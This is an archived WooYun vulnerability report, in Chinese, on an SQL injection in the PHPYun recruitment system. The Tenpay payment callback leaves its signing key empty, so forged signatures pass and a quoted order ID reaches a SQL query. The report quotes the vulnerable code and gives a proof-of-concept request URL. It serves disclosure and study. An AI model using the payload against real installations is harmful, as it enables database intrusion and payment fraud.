乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-22: 细节已通知厂商并且等待厂商处理中 2013-11-22: 厂商已经确认,细节仅向厂商公开 2013-11-25: 细节向第三方安全合作伙伴开放 2014-01-16: 细节向核心白帽子及相关领域专家公开 2014-01-26: 细节向普通白帽子公开 2014-02-05: 细节向实习白帽子公开 2014-02-20: 细节向公众公开
php云人才系统 注入漏洞
php云人才系统 注入漏洞tenpay的KEY没有初始化导致的注入漏洞!
/api/tenpay/return_url.phprequire_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php");$db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']);/* 密钥 */$key =$tenpay[sy_tenpaycode];//密钥没有定义=========tenpay_data.php<?php/* * Created on 2012 * Link for [email protected] * This PHPYun.Rencai System Powered by PHPYun.com */$tenpaydata=array("sy_weburl"=>"http://www.job.com","sy_tenpayid"=>"","sy_tenpaycode"=>"")//没有定义KEY 所以是空~~;?>=========/* 创建支付应答对象 */$resHandler = new PayResponseHandler();$resHandler->setKey($key);//还是key没有初始化~~//判断签名if($resHandler->isTenpaySign()) {//验证过程/**********************************3 function isTenpaySign() { $cmdno = $this->getParameter("cmdno"); $pay_result = $this->getParameter("pay_result"); $date = $this->getParameter("date"); $transaction_id = $this->getParameter("transaction_id"); $sp_billno = $this->getParameter("sp_billno"); $total_fee = $this->getParameter("total_fee"); $fee_type = $this->getParameter("fee_type"); $attach = $this->getParameter("attach"); $key = $this->getKey(); $signPars = ""; //组织签名串$signPars = "cmdno=" . $cmdno . "&" . "pay_result=" . $pay_result . "&" . "date=" . $date . "&" . "transaction_id=" . $transaction_id . "&" . "sp_billno=" . $sp_billno . "&" . "total_fee=" . $total_fee . "&" . "fee_type=" . $fee_type . "&" . "attach=" . $attach . "&" . "key=" . $key; $sign = strtolower(md5($signPars));//key是空 其他都是可控 我们之间就可以生成key 所以验证形同虚设 没有设置key的时候***********************************/ //交易单号 $transaction_id = $resHandler->getParameter("transaction_id"); //本站单号 $sp_billno = $resHandler->getParameter("sp_billno"); //金额,以分为单位 $total_fee = $resHandler->getParameter("total_fee"); //支付结果 $pay_result = $resHandler->getParameter("pay_result"); //类型 $attach = $resHandler->getParameter("attach"); if( "0" == $pay_result ) { //------------------------------ //处理业务开始 //------------------------------ //注意交易单不要重复处理 //注意判断返回金额//处理本站信息开始echo "select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'"; $sql=$db->query("select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'"); $row=mysql_fetch_array($sql);
测试方法http://127.0.0.1/yun3/api/tenpay/return_url.php?sign=ba7b763f604fb46432eac7fb601c55c1&sp_billno=1%27&pay_result=0
过滤~~
危害等级:高
漏洞Rank:20
确认时间:2013-11-22 18:55
感谢您的提供!
暂无